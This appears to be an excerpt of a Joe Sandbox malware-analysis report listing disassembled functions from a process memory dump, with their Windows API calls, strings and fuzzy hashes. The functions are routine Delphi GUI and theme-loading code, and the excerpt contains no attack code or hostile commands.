Function 040B4F80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 040B4F93

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: f9cf8d993bf6b984c3a206198d86c8bdb50b9fa8060aaea77c6d17370c297a51
Instruction ID: fa35e770d7feed8b227c734e2da3df285f8f3704bdce4a57e00902ba18440060
Opcode Fuzzy Hash: f9cf8d993bf6b984c3a206198d86c8bdb50b9fa8060aaea77c6d17370c297a51
Instruction Fuzzy Hash: BAC012B16512214BFF719A989CC0BD563DC9B05295F5400A1E444FB341E260F91053D4

Uniqueness

Uniqueness Score: -1.00%

Function 040B5058 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 040B4F76
SysFreeString.OLEAUT32 ref: 040B5075

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 478ca0e79f943246b1b3029f9eea381ecbc249769f11debf24d3064ab636df96
Instruction ID: 93d5e949515a8db780f7eae947cbc6af170a70424d50cd471be6926f510b221f
Opcode Fuzzy Hash: 478ca0e79f943246b1b3029f9eea381ecbc249769f11debf24d3064ab636df96
Instruction Fuzzy Hash: DAC0807C1053035DBF042F704914AFE23BC9D81244B85005CD881F9141D534F472B4AD

Uniqueness

Uniqueness Score: -1.00%

Function 040B1668 Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004), ref: 040B167E

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a9709931aea05d5966e5d6d0b097d8b07f26ba9ce0cf299c026baaf52ac2ab72
Instruction ID: 9b098a81e8b96e11a9259732c269011757280b5842c714ee7505b97e872665b1
Opcode Fuzzy Hash: a9709931aea05d5966e5d6d0b097d8b07f26ba9ce0cf299c026baaf52ac2ab72
Instruction Fuzzy Hash: BDF037F47013004BEB06DF7A99583426AD2E78928AF548139D619EB3C8E77998458B44

Uniqueness

Uniqueness Score: -1.00%

Function 040B171E Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 040B1740

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e0bfdca57ed0deed513808a064e3fca86028c775d45bb0c0bda36d2f6c19c22d
Instruction ID: 0b7a392f69351f5e8d421dbb4ebd20ddf13a23fcdb2630290a68be4cf82a8393
Opcode Fuzzy Hash: e0bfdca57ed0deed513808a064e3fca86028c775d45bb0c0bda36d2f6c19c22d
Instruction Fuzzy Hash: 54F090F6A007556BE3118E6A9C80B83BB94FB80799F050139EA48AB344D775AC408BD4

Uniqueness

Uniqueness Score: -1.00%

Function 040B1782 Relevance: 1.3, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 040B17A0

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 94364fdfbca073c1b0e0f95dcec971c8997ecdc4e91789f859ffd66c719bdc42
Instruction ID: 7e446f86f871bf02c446d700c667c8194daaed7347bd2c069f3f0826abffd78c
Opcode Fuzzy Hash: 94364fdfbca073c1b0e0f95dcec971c8997ecdc4e91789f859ffd66c719bdc42
Instruction Fuzzy Hash: 2FE04F753103016EE7101E7E5C50B976AE8EB496A5F244665F691EF2D1D264F80087A4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0410319C Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 405COMMON

Download Yara Rule

Strings

vcltest3.dll, xrefs: 0410359D
RegisterAutomation, xrefs: 041035BE

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID:
String ID: RegisterAutomation$vcltest3.dll
API String ID: 0-2963190186
Opcode ID: 2b906a07f816678fe0d545de7196e083eba271277ab4a0cd57c010302efec984
Instruction ID: 60763482d7217bf46673698e77505611cdeb1702f1b989dfdbf1d6caa2f410a4
Opcode Fuzzy Hash: 2b906a07f816678fe0d545de7196e083eba271277ab4a0cd57c010302efec984
Instruction Fuzzy Hash: F7E13A35A40208EFEB24DB68C5C4A9DB7B1AF48314F15C2E6E865AB2D5D7B0FE40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 040FFCD8 Relevance: 20.0, APIs: 13, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b14762d5f4b3fe996c981923a00535b0ee540827f9b34f81d319dd3f6c72829c
Instruction ID: 61e776f964c4c7087ff221aa428337562fe121add5cd7278272dc40b3688501a
Opcode Fuzzy Hash: b14762d5f4b3fe996c981923a00535b0ee540827f9b34f81d319dd3f6c72829c
Instruction Fuzzy Hash: E5023A35A04244EFEB50DFA8D9C4B9D77F5AF48348F1640A0EA44AB2A2D775BE81DB40

Uniqueness

Uniqueness Score: -1.00%

Function 040F224C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 040F225B
GetWindowPlacement.USER32(?,0000002C), ref: 040F2278
GetWindowRect.USER32(?), ref: 040F2291
GetWindowLongA.USER32(?,000000F0), ref: 040F229F
GetWindowLongA.USER32(?,000000F8), ref: 040F22B4
ScreenToClient.USER32(00000000), ref: 040F22C1
ScreenToClient.USER32(00000000,?), ref: 040F22CC

Strings

,, xrefs: 040F2264

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: 11bc10056f08039989a3272d8451c8fa8ef77ab95f4f623aa4a2d6adde776a4c
Instruction ID: bfa9076b0eddad8e38f3d054f3667e6b89592b236e0006167bd0a5b665dff504
Opcode Fuzzy Hash: 11bc10056f08039989a3272d8451c8fa8ef77ab95f4f623aa4a2d6adde776a4c
Instruction Fuzzy Hash: 18112E71504701AFDB50DFACC984ACB77D8AF89218F044A69FE98EB345D735E8048BA2

Uniqueness

Uniqueness Score: -1.00%

Function 040FC508 Relevance: 10.8, APIs: 7, Instructions: 332windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32(00000000), ref: 040FC5CF
SaveDC.GDI32(?), ref: 040FC78D
RestoreDC.GDI32(?,?), ref: 040FC7FE
GetWindowDC.USER32(00000000), ref: 040FC86A
SaveDC.GDI32(?), ref: 040FC8A1
RestoreDC.GDI32(?,?), ref: 040FC905

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: RestoreSave$FocusWindow
String ID:
API String ID: 1553564791-0
Opcode ID: c572c5ad271f81c8b5cd1bac0c7b2dcdc7eef828c7c36d92de9e4ebab25e92fa
Instruction ID: 4812c757c09f1c5293bf2950d7a37e8f79df1c976e053a91ca8f4338e4cb7c96
Opcode Fuzzy Hash: c572c5ad271f81c8b5cd1bac0c7b2dcdc7eef828c7c36d92de9e4ebab25e92fa
Instruction Fuzzy Hash: 59C15A31A082099FEB55DF68C88AABEB3F5FB44708F1544B5E944BBA50DB34BE40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 040E3E00 Relevance: 7.9, APIs: 5, Instructions: 405nativeCOMMON

Download Yara Rule

APIs

GetWindowDC.USER32(?,00000000,040E4334), ref: 040E41BE
SaveDC.GDI32(?), ref: 040E41F5
RestoreDC.GDI32(?,?), ref: 040E4262
NtdllDefWindowProc_A.NTDLL(?,?,?,?,00000000,040E4334), ref: 040E4316

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Window$NtdllProc_RestoreSave
String ID:
API String ID: 1045853612-0
Opcode ID: 8f19634dc61cb484c8b6b845172d7be93995e4b73c5feff1c5c47d2ad564f26e
Instruction ID: d64184311a049ecfded070fafa80c44c8366c99a386278c83005ac07f35337b7
Opcode Fuzzy Hash: 8f19634dc61cb484c8b6b845172d7be93995e4b73c5feff1c5c47d2ad564f26e
Instruction Fuzzy Hash: 80E12434A0460ADFDB10EFAAC8809AEB7F5EF88308B1586A5E941B7361D634FD51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 040DB744 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(uxtheme.dll,00000000,040DBAF7), ref: 040DB77A
GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 040DB792
GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 040DB7A4
GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 040DB7B6
GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 040DB7C8
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 040DB7DA
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 040DB7EC
GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 040DB7FE
GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 040DB810
GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 040DB822
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 040DB834
GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 040DB846
GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 040DB858
GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 040DB86A
GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 040DB87C
GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 040DB88E
GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 040DB8A0
GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 040DB8B2
GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 040DB8C4
GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 040DB8D6
GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 040DB8E8
GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 040DB8FA
GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 040DB90C
GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 040DB91E
GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 040DB930
GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 040DB942
GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 040DB954
GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 040DB966
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 040DB978
GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 040DB98A
GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 040DB99C
GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 040DB9AE
GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 040DB9C0
GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 040DB9D2
GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 040DB9E4
GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 040DB9F6
GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 040DBA08
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 040DBA1A
GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 040DBA2C
GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 040DBA3E
GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 040DBA50
GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 040DBA62
GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 040DBA74
GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 040DBA86
GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 040DBA98
GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 040DBAAA
GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 040DBABC
GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 040DBACE

Strings

GetThemeIntList, xrefs: 040DB94C
uxtheme.dll, xrefs: 040DB775
DrawThemeEdge, xrefs: 040DB850
GetThemeString, xrefs: 040DB8BC
GetCurrentThemeName, xrefs: 040DBA90
OpenThemeData, xrefs: 040DB78A
GetThemeColor, xrefs: 040DB898
IsThemeDialogTextureEnabled, xrefs: 040DBA5A
GetThemeDocumentationProperty, xrefs: 040DBAA2
GetThemeTextExtent, xrefs: 040DB808
GetThemeInt, xrefs: 040DB8E0
EnableThemeDialogTexture, xrefs: 040DBA48
DrawThemeBackground, xrefs: 040DB7AE
DrawThemeParentBackground, xrefs: 040DBAB4
GetThemeFilename, xrefs: 040DB982
GetThemeSysFont, xrefs: 040DB9DC
IsAppThemed, xrefs: 040DBA24
GetThemeSysInt, xrefs: 040DBA00
SetThemeAppProperties, xrefs: 040DBA7E
GetThemeSysBool, xrefs: 040DB9B8
GetThemeFont, xrefs: 040DB916
GetThemePartSize, xrefs: 040DB7F6
GetThemeBool, xrefs: 040DB8CE
GetThemeSysSize, xrefs: 040DB9CA
GetThemeTextMetrics, xrefs: 040DB81A
GetThemeBackgroundRegion, xrefs: 040DB82C
GetThemePosition, xrefs: 040DB904
GetThemeBackgroundContentRect, xrefs: 040DB7D2, 040DB7E4
SetWindowTheme, xrefs: 040DB970
GetThemePropertyOrigin, xrefs: 040DB95E
GetThemeMetric, xrefs: 040DB8AA
IsThemeActive, xrefs: 040DBA12
GetThemeEnumValue, xrefs: 040DB8F2
GetThemeSysColorBrush, xrefs: 040DB9A6
DrawThemeText, xrefs: 040DB7C0
IsThemePartDefined, xrefs: 040DB874
GetThemeRect, xrefs: 040DB928
GetThemeSysColor, xrefs: 040DB994
GetThemeMargins, xrefs: 040DB93A
GetThemeSysString, xrefs: 040DB9EE
HitTestThemeBackground, xrefs: 040DB83E
DrawThemeIcon, xrefs: 040DB862
IsThemeBackgroundPartiallyTransparent, xrefs: 040DB886
CloseThemeData, xrefs: 040DB79C
GetThemeAppProperties, xrefs: 040DBA6C
GetWindowTheme, xrefs: 040DBA36
EnableTheming, xrefs: 040DBAC6

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
API String ID: 2238633743-2910565190
Opcode ID: 9195e1ffab7569d5e7964eb7cf23c8ba0bad8700f6f9fdf4448e8d60992155ad
Instruction ID: c68b80f263d191764404eebfc0dcbf1733ded675b279450e505a9e9e3eec9c15
Opcode Fuzzy Hash: 9195e1ffab7569d5e7964eb7cf23c8ba0bad8700f6f9fdf4448e8d60992155ad
Instruction Fuzzy Hash: 8CA144B5A80740AFEF00EFA5D8D2EA537B8EF457483020964B415EF204DA78BC88CF56

Uniqueness

Uniqueness Score: -1.00%

Function 040F7028 Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95libraryloaderCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008000), ref: 040F7041
GetModuleHandleA.KERNEL32(USER32,00000000,040F718E,?,00008000), ref: 040F7065
GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 040F7072
LoadLibraryA.KERNEL32(imm32.dll,00000000,040F718E,?,00008000), ref: 040F708E
GetProcAddress.KERNEL32(0411B54C,ImmGetContext), ref: 040F70B0
GetProcAddress.KERNEL32(0411B54C,ImmReleaseContext), ref: 040F70C5
GetProcAddress.KERNEL32(0411B54C,ImmGetConversionStatus), ref: 040F70DA
GetProcAddress.KERNEL32(0411B54C,ImmSetConversionStatus), ref: 040F70EF
GetProcAddress.KERNEL32(0411B54C,ImmSetOpenStatus), ref: 040F7104
GetProcAddress.KERNEL32(0411B54C,ImmSetCompositionWindow), ref: 040F7119
GetProcAddress.KERNEL32(0411B54C,ImmSetCompositionFontA), ref: 040F712E
GetProcAddress.KERNEL32(0411B54C,ImmGetCompositionStringA), ref: 040F7143
GetProcAddress.KERNEL32(0411B54C,ImmIsIME), ref: 040F7158
GetProcAddress.KERNEL32(0411B54C,ImmNotifyIME), ref: 040F716D
SetErrorMode.KERNEL32(?,040F7195,00008000), ref: 040F7188

Strings

ImmGetContext, xrefs: 040F70A5
ImmGetConversionStatus, xrefs: 040F70CF
WINNLSEnableIME, xrefs: 040F706C
ImmSetCompositionWindow, xrefs: 040F710E
ImmSetOpenStatus, xrefs: 040F70F9
ImmIsIME, xrefs: 040F714D
ImmNotifyIME, xrefs: 040F7162
USER32, xrefs: 040F7060
ImmSetConversionStatus, xrefs: 040F70E4
ImmSetCompositionFontA, xrefs: 040F7123
ImmReleaseContext, xrefs: 040F70BA
ImmGetCompositionStringA, xrefs: 040F7138
imm32.dll, xrefs: 040F7089

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
API String ID: 3397921170-3950384806
Opcode ID: 9620ba92515a5410f79f4759aea68ec4a2627a1d60aab93c186f7f1fc7f29d09
Instruction ID: 75c4272775f763946c9250395cc7bdde7f3da7146ae30b92c34e71d2790c1a42
Opcode Fuzzy Hash: 9620ba92515a5410f79f4759aea68ec4a2627a1d60aab93c186f7f1fc7f29d09
Instruction Fuzzy Hash: D53170B6684340AFEB54DFB6AC85EA537F8E784308B014820F605AB610D67E7CC4CF56

Uniqueness

Uniqueness Score: -1.00%

Function 040D36B0 Relevance: 34.7, APIs: 23, Instructions: 245windowCOMMON

Download Yara Rule

APIs

CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 040D36F3
SelectObject.GDI32(?,?), ref: 040D3708
SelectObject.GDI32(?,?), ref: 040D3766
DeleteObject.GDI32(?), ref: 040D3772
CreateCompatibleDC.GDI32(00000000), ref: 040D3786
CreateCompatibleBitmap.GDI32(?,?,?), ref: 040D37A7
SelectObject.GDI32(?,?), ref: 040D37BC
SelectPalette.GDI32(?,?,00000000), ref: 040D37E2
SelectPalette.GDI32(?,00000000,000000FF), ref: 040D37F7
SelectPalette.GDI32(?,0414A36C,000000FF), ref: 040D380D
RealizePalette.GDI32(?), ref: 040D3819
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 040D383B
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 040D385D
SetTextColor.GDI32(?,00000000), ref: 040D3865
SetBkColor.GDI32(?,00FFFFFF), ref: 040D3873
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 040D389F
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 040D38C4
SetTextColor.GDI32(?,?), ref: 040D38CE
SetBkColor.GDI32(?,?), ref: 040D38D8
SelectObject.GDI32(?,00000000), ref: 040D38EB
DeleteObject.GDI32(?), ref: 040D38F4
SelectPalette.GDI32(?,00000000,00000000), ref: 040D3916
DeleteDC.GDI32(?), ref: 040D391F

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Select$Object$Palette$ColorStretch$CompatibleCreateDelete$BitmapText$Realize
String ID:
API String ID: 3080934952-0
Opcode ID: aa31046cb77343b6b42397443806d67e827ff4a30e75fa4c8501a66ed95c11ae
Instruction ID: a0e7b4d5b31bfe4b5a8b79300f09235e54a41186470252e5185567ea9cf3414e
Opcode Fuzzy Hash: aa31046cb77343b6b42397443806d67e827ff4a30e75fa4c8501a66ed95c11ae
Instruction Fuzzy Hash: 018164B2A00209AFDB51DFA8CD85EEF77FCEB09618F110555BA18F7240D636AD008B65

Uniqueness

Uniqueness Score: -1.00%

Function 040D5644 Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000054,?), ref: 040D5667
GetDC.USER32(00000000), ref: 040D5695
CreateCompatibleDC.GDI32(?), ref: 040D56A6
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 040D56C1
SelectObject.GDI32(?,00000000), ref: 040D56DB
PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 040D56FD
CreateCompatibleDC.GDI32(?), ref: 040D570B
SelectObject.GDI32(?), ref: 040D5753
SelectPalette.GDI32(?,?,00000000), ref: 040D5766
RealizePalette.GDI32(?), ref: 040D576F
SelectPalette.GDI32(?,?,00000000), ref: 040D577B
RealizePalette.GDI32(?), ref: 040D5784
SetBkColor.GDI32(?), ref: 040D578E
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 040D57B2
SetBkColor.GDI32(?,00000000), ref: 040D57BC
SelectObject.GDI32(?,00000000), ref: 040D57CF
DeleteObject.GDI32 ref: 040D57DB
DeleteDC.GDI32(?), ref: 040D57F1
SelectObject.GDI32(?,00000000), ref: 040D580C
DeleteDC.GDI32(00000000), ref: 040D5828
ReleaseDC.USER32(00000000,00000000), ref: 040D5839

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
String ID:
API String ID: 332224125-0
Opcode ID: 4666a2e10c2ffaf06d3fa02e205f26301c4ecefd4bd884c7cfae98e72c7f1994
Instruction ID: 9a67c809de21e127711ac92fb2d87a8947930c436515a064431e3b8dd6a99d73
Opcode Fuzzy Hash: 4666a2e10c2ffaf06d3fa02e205f26301c4ecefd4bd884c7cfae98e72c7f1994
Instruction Fuzzy Hash: D951CE72E00309BBEB51DBE8CC45FEEB7FCAB08708F144865BA54F7180D675A9448B95

Uniqueness

Uniqueness Score: -1.00%

Function 040D63D4 Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 040D6642
CreateCompatibleDC.GDI32(00000001), ref: 040D66A7
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 040D66BC
SelectObject.GDI32(?,00000000), ref: 040D66C6
SelectPalette.GDI32(?,?,00000000), ref: 040D66F6
RealizePalette.GDI32(?), ref: 040D6702
CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 040D6726
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,040D677F,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 040D6734
SelectPalette.GDI32(?,00000000,000000FF), ref: 040D6766
SelectObject.GDI32(?,?), ref: 040D6773
DeleteObject.GDI32(00000000), ref: 040D6779

Strings

BM, xrefs: 040D64F8
(, xrefs: 040D658D

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
String ID: ($BM
API String ID: 2831685396-2980357723
Opcode ID: d17b926086a66f966e306b7d12cc1cf919fde4b7c9f7a567046ca9d4e84bc57e
Instruction ID: d61839d516a70c02238d87ff53404174486e1f22caf39297642573bd14c18609
Opcode Fuzzy Hash: d17b926086a66f966e306b7d12cc1cf919fde4b7c9f7a567046ca9d4e84bc57e
Instruction Fuzzy Hash: 62D12971A002189FDF54EFA8C894BEEBBF5FF48308F048965E904BB255D735A844CB65

Uniqueness

Uniqueness Score: -1.00%

Function 040F2D88 Relevance: 24.3, APIs: 16, Instructions: 258COMMON

Download Yara Rule

APIs

GetWindowDC.USER32(00000000), ref: 040F2DBC
GetClientRect.USER32(00000000,?), ref: 040F2DDF
GetWindowRect.USER32(00000000,?), ref: 040F2DF1
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 040F2E07
OffsetRect.USER32(?,?,?), ref: 040F2E1C
ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 040F2E35
InflateRect.USER32(?,00000000,00000000), ref: 040F2E53
GetWindowLongA.USER32(00000000,000000F0), ref: 040F2E6D
DrawEdge.USER32(?,?,?,00000008), ref: 040F2F6C
IntersectClipRect.GDI32(?,?,?,?,?), ref: 040F2F85
OffsetRect.USER32(?,?,?), ref: 040F2FAF
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 040F2FD4
IntersectRect.USER32(?,?,?), ref: 040F2FE5
OffsetRect.USER32(?,?,?), ref: 040F2FFA
FillRect.USER32(?,?,00000000), ref: 040F3016
ReleaseDC.USER32(00000000,?), ref: 040F3035

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Rect$Window$Offset$ClipIntersectPoints$ClientDrawEdgeExcludeFillInflateLongRelease
String ID:
API String ID: 2490777911-0
Opcode ID: d031748ea4fa6820c9afa1d81362acbc1538e3d4e8593b45a19784ddeb85de4f
Instruction ID: 24079514cd63de2ed36c2d6f122876d2c13573144772227cd341d652459293bc
Opcode Fuzzy Hash: d031748ea4fa6820c9afa1d81362acbc1538e3d4e8593b45a19784ddeb85de4f
Instruction Fuzzy Hash: 3FA13871E00208AFDB41DBA8C895EEEB7F9AF49308F1440A5EA54FB251C775BE05DB60

Uniqueness

